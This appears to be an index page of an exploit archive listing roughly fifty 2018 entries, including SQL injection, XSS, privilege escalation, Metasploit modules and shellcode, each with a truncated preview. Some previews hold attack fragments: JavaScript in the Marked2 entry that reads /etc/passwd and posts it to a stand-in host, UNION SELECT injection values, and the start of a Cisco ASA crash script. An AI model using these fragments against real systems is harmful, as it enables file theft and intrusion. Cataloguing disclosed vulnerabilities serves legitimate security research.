Juju-run Agent - Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Juju-run Agent Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Juju agent systems running the juju-run...

LogicalDOC Enterprise 7.7.4 - Directory Traversal

LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle...

Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection

Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/ Version: 1.0.9 Category: Webapps CVE: N/...

Readymade Video Sharing Script 3.2 - 'search' SQL Injection

Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Version: 3.2 Tested on: Windows...

Schools Alert Management Script 2.0.2 - Arbitrary File Upload

Schools Alert Management Script 2.0.2 - Arbitrary File Upload. CVE-2018-6860. Webapps exploit for PHP platform Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

Facebook Clone Script 1.0.5 - Cross-Site Scripting

Facebook Clone Script 1.0.5 - Cross-Site Scripting. CVE-2018-6858. Webapps exploit for PHP platform Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/...

Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting

Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting. CVE-2018-6864. Webapps exploit for PHP platform Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure

Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to obtain data by URL, usually used as:...

Naukri Clone Script 3.0.3 - 'indus' SQL Injection

Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version: 3.0.3 Category: Webapps CVE: N/A Description: Th...

Select Your College Script 2.0.2 - Authentication Bypass

Select Your College Script 2.0.2 - Authentication Bypass. CVE-2018-6863. Webapps exploit for PHP platform Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software...

Bitcoin MLM Software 1.0.2 - Cross-Site Scripting

Bitcoin MLM Software 1.0.2 - Cross-Site Scripting. CVE-2018-6862. Webapps exploit for PHP platform Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/ Category:...

JBoss 4.2.x/4.3.x - Information Disclosure

JBoss 4.2.x/4.3.x - Information Disclosure. CVE-2010-1429. Remote exploit for Multiple platform Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X Date: 02/08/2018 Exploit Author: JameelNabbo Vendor Homepage: http://www.jboss.org Software Link: http://jbossas.jboss.org/downloads...

Lawyer Search Script 1.0.2 - Cross-Site Scripting

Lawyer Search Script 1.0.2 - Cross-Site Scripting. CVE-2018-6861. Webapps exploit for PHP platform Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/lawyer-script/...

Multi Language Olx Clone Script - Cross-Site Scripting

Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web Application Version:2.0.6 Tested on: Windows 7 CVE: NA...

macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'

/ AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort method: text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPortipcport , unsigned int,...

Naukri Clone Script - Persistent Cross-Site Scripting

Naukri Clone Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Naukri Clone Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage:...

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution

Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe Coldfusion 11.0.03.292866 Tested On: Windows 10 Enterprise 10.0.15063 CVE: CVE-2017-3066...

Android - 'getpidcon' Permission Bypass in KeyStore Service

The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also...

Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting

Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...

Entrepreneur Dating Script 2.0.2 - Authentication Bypass

Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ Version: 2.0.2 Category: Webapps CVE: N/A...

Cisco ASA - Crash (PoC)

Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...

Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting

Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...

Online Test Script 2.0.7 - 'cid' SQL Injection

Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7 Category: Webapps CVE: N/A Description: The...

Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting

Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting. CVE-2018-6655. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web:...

Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption

Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory exhaustion The vulnerability is due to an error when the...

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation

/ Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE: CVE-2018-6606 / include include include BOOL...

Marked2 - Local File Disclosure

var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest; xhr.open'POST', extract, true; xhr.onload...

MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation

/ Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date : 02/02/2018 Author : Souhail Hammou Vendor Homepage : https://www.malwarefox.com/ Version : 2.74.0.150 Tested on : Windows 7 32-bit / Windows 10 64-bit CVE : CVE-2018-6593 / include include include include pragma...

Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection

input name="id" value="-11 UNION ALL SELECT...

HPE iLO 4 < 2.53 - Add New Administrator User

!/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769enus Other...

Joomla! Component JSP Tickets 1.1 - SQL Injection

Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ Version: 1.1 Category: Webapps Tested on:...

Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apport / ABRT chroot Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Linux systems by invoking the...

Claymore Dual GPU Miner 10.5 - Format String

Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After reading about the recent vulnerabilities with previous version...

NixCMS 1.0 - 'category_id' SQL Injection

Exploit Title: NixCMS 1.0 - 'categoryid' SQL Ýnjection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan Author WebSite : http://borabozdogan.net....

Matrimonial Website Script 2.1.6 - 'uid' SQL Injection

Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection Dork: N/A Date: 2018-02-03 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/matrimonial-website-script/ Version: 2.1.6 Category: Webapps CVE: N/A...

Wonder CMS 2.3.1 - 'Host' Header Injection

Exploit Title: Wonder CMS 2.3.1 Host Header Injection Date: 30-01-2018 Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.wondercms.com/ Version: 2.3.1 CVE : CVE-2017-14523 Category: Webapp CMS 1...

BOCHS 2.6-5 - Local Buffer Overflow

Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Program...

Joomla! Component jLike 1.0 - Information Leak

"; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...

Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Windows XP systems that are not part of a domain default to treating all network logons as if they were Guest. This prevents SMB relay attacks from gaining administrativ...

Wonder CMS 2.3.1 - Unrestricted File Upload

Affected Code: public static function uploadFile + - if ! wCMS::$loggedIn && ! isset$FILES'uploadFile' && ! isset$REQUEST'token' return; + private static function uploadFileAction - if isset$REQUEST'token' && $REQUEST'token' == wCMS::generateToken && isset$FILES'uploadFile' Proof of Concept Steps...

Netis WF2419 Router - Cross-Site Scripting

Exploit Title: Netis-WF2419 HTML Injection Date: 20/01/2018 Exploit Author: Sajibe Kanti Author Contact :https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419 , V3.2.41381 Tested on: Windows 10 CEV : CVE-2018-6190 HTML Injection in Netis-WF2419...

Online Voting System - Authentication Bypass

Exploit Title: Online Voting System - Authentication Bypass Date: 02.02.2018 Vendor Homepage: http://themashabrand.com Software Link: http://themashabrand.com/p/votin Demo: http://localhost/Onlinevoting Version: 1.0 Category: Webapps Exploit Author: Giulio Comi CVE : CVE-2018-6180 Description A...

Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection

input name="id" value="-11 UNION ALL SELECT...

Student Profile Management System Script 2.0.6 - Authentication Bypass

Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Dork: "Powered by: i-Net Solution" Date: 2018-02-06 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...

WordPress Core - 'load-scripts.php' Denial of Service

EDB Note: python doser.py -g...

Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection

input name="id" value="-11 UNION ALL SELECT...

Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection

...

Real Estate Custom Script - 'route' SQL Injection

Exploit Title: Real Estate Custom Script - 'route' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075 Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13.3 Email:...

Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection

Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/jextn-reverse-auction/ Version: 3.1.0 Category: Webapps Tested on:...

Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode

Linux/x64 - Twofish Encoded + DNS CNAME Password + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...